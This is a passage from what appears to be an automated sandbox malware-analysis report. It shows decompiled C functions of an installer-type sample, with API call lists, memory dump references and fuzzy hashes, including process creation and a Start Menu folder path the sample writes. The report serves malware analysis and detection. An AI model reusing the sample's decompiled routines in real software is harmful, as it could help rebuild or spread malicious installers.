                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                        • Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
                                                        • Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                        • Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004032F5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004032F5(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                        0x00403303
                                                        0x00403309

                                                        APIs
                                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403303
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                        • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                        • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                        • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404203 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00404203(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x4236e4, _a4); // executed
				return _t2;
			}




                                                        0x0040420d
                                                        0x00404213

                                                        APIs
                                                        • KiUserCallbackDispatcher.NTDLL(?,00403FDA), ref: 0040420D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: CallbackDispatcherUser
                                                        • String ID:
                                                        • API String ID: 2492992576-0
                                                        • Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                        • Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
                                                        • Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                        • Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 78%
                                                        			E00401F00() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402C37(_t15);
				E004052B0(0xffffffeb, _t7); // executed
				_t9 = E00405831(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x20)) != _t15) {
						_t13 = E004066D7(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x24)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E00406193( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                                                        0x00401f06
                                                        0x00401f0b
                                                        0x00401f11
                                                        0x00401f16
                                                        0x00401f1a
                                                        0x00402885
                                                        0x00401f20
                                                        0x00401f23
                                                        0x00401f26
                                                        0x00401f2e
                                                        0x00401f3d
                                                        0x00401f3f
                                                        0x00401f3f
                                                        0x00401f30
                                                        0x00401f34
                                                        0x00401f34
                                                        0x00401f2e
                                                        0x00401f46
                                                        0x00401f47
                                                        0x00401f47
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                          • Part of subcall function 004052B0: lstrlenW.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                          • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                          • Part of subcall function 004052B0: lstrcatW.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00403233), ref: 0040530B
                                                          • Part of subcall function 004052B0: SetWindowTextW.USER32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 0040531D
                                                          • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                          • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                          • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                          • Part of subcall function 00405831: CreateProcessW.KERNELBASE ref: 0040585A
                                                          • Part of subcall function 00405831: CloseHandle.KERNEL32(?), ref: 00405867
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                          • Part of subcall function 004066D7: WaitForSingleObject.KERNEL32(?,00000064), ref: 004066E8
                                                          • Part of subcall function 004066D7: GetExitCodeProcess.KERNEL32 ref: 0040670A
                                                          • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                        • String ID:
                                                        • API String ID: 2972824698-0
                                                        • Opcode ID: c16697fcb2bd3d13e2a0f714b19764dceb2bd972e2531188fe870dcb6e060f9f
                                                        • Instruction ID: bab1dc3541612b80991091494b36371daed99366b6aa6fafa292830653d85492
                                                        • Opcode Fuzzy Hash: c16697fcb2bd3d13e2a0f714b19764dceb2bd972e2531188fe870dcb6e060f9f
                                                        • Instruction Fuzzy Hash: 95F09032905121EBCB21FBA18D8899E72A49F01328B2505BBF501F21D1C77D0E518AAE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402C15(_t7);
				 *((intOrPtr*)(_t13 - 0x4c)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}







                                                        0x004014d7
                                                        0x004014d8
                                                        0x004014e1
                                                        0x004014e4
                                                        0x004014e8
                                                        0x004014e8
                                                        0x004014ea
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 631673ee5c1514c42db72881fe5300a3541e6f73d544da548d52187aa9158ecf
                                                        • Instruction ID: a3662d66bb57f0e4aff7a204df28f74e708ba92ca424d5dc4d08b62f06a02aad
                                                        • Opcode Fuzzy Hash: 631673ee5c1514c42db72881fe5300a3541e6f73d544da548d52187aa9158ecf
                                                        • Instruction Fuzzy Hash: F6D0A773F141008FD720EBB8BE8945E73F8E7803193208837E102F11D2E578C8528A6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E1000121B() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x1000406c +  *0x1000406c); // executed
				return _t3;
			}




                                                        0x10001225
                                                        0x1000122b

                                                        APIs
                                                        • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.841534468.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000002.00000002.841525683.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.841545533.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.841553679.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_10000000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: AllocGlobal
                                                        • String ID:
                                                        • API String ID: 3761449716-0
                                                        • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                        • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                        • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                        • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 00404C2C Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 96%
                                                        			E00404C2C(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t276;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageW;
				_v20 =  *0x42a248;
				_t282 = 0;
				_v24 =  *0x42a214 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x42a21d & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404B7A(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x818 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x42a21c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x4236cc;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x4236e0;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x4236cc = _t282;
								 *0x4236e0 = _t282;
								 *0x42a280 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x42a21d & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404BFA();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x4236e0;
									_t195 =  *0x42a248;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x42a24c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										if( *((intOrPtr*)( *0x4291dc + 0x10)) != _t282) {
											E00404B35(0x3ff, 0xfffffffb, E00404B4D(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageW(_v8, 0x113f, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x206]);
									} while (_v20 <  *0x42a24c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x4236e0);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageW(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageW(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x42a280 = _t306;
					 *0x4236e0 = GlobalAlloc(0x40,  *0x42a24c << 2);
					_t252 = LoadBitmapW( *0x42a200, 0x6e);
					 *0x4236d4 =  *0x4236d4 | 0xffffffff;
					_t313 = _t252;
					 *0x4236dc = SetWindowLongW(_v8, 0xfffffffc, E00405224);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x4236cc = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x4236cc);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E0040626E(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E004041E1(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E004041E1(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x42a24c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										 *( *0x4236e0 + _t316 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v84);
									} else {
										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
									_v32 = 1;
									 *( *0x4236e0 + _t316 * 4) = _t276;
									_t284 =  *( *0x4236e0 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x818]);
							_v28 = _t302;
						} while (_t316 <  *0x42a24c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E00404216(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404216(_v12);
								L91:
								return E00404248(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}




























































                                                        0x00404c3b
                                                        0x00404c4c
                                                        0x00404c51
                                                        0x00404c59
                                                        0x00404c5f
                                                        0x00404c67
                                                        0x00404c75
                                                        0x00404c78
                                                        0x00404e99
                                                        0x00404ea0
                                                        0x00404eb4
                                                        0x00404ea2
                                                        0x00404ea4
                                                        0x00404ea7
                                                        0x00404ea8
                                                        0x00404eaf
                                                        0x00404eaf
                                                        0x00404ec0
                                                        0x00404ece
                                                        0x00404ed1
                                                        0x00404ee7
                                                        0x00404f5c
                                                        0x00404f5f
                                                        0x00404f61
                                                        0x00404f6b
                                                        0x00404f79
                                                        0x00404f79
                                                        0x00404f7b
                                                        0x00404f85
                                                        0x00404f8b
                                                        0x00404f8e
                                                        0x00404f91
                                                        0x00404fac
                                                        0x00404f93
                                                        0x00404f9d
                                                        0x00404f9d
                                                        0x00404f91
                                                        0x00404f85
                                                        0x00000000
                                                        0x00404f5f
                                                        0x00404eec
                                                        0x00404ef7
                                                        0x00404efc
                                                        0x00404f03
                                                        0x00404f08
                                                        0x00404f0c
                                                        0x00404f17
                                                        0x00404f17
                                                        0x00404f1b
                                                        0x00404f1f
                                                        0x00404f23
                                                        0x00404f36
                                                        0x00404f25
                                                        0x00404f25
                                                        0x00404f2c
                                                        0x00404f32
                                                        0x00404f2e
                                                        0x00404f2e
                                                        0x00404f2e
                                                        0x00404f2c
                                                        0x00404f3a
                                                        0x00404f3c
                                                        0x00404f4f
                                                        0x00404f52
                                                        0x00404f55
                                                        0x00404f55
                                                        0x00404f1f
                                                        0x00000000
                                                        0x00404f0c
                                                        0x00404eee
                                                        0x00404ef5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
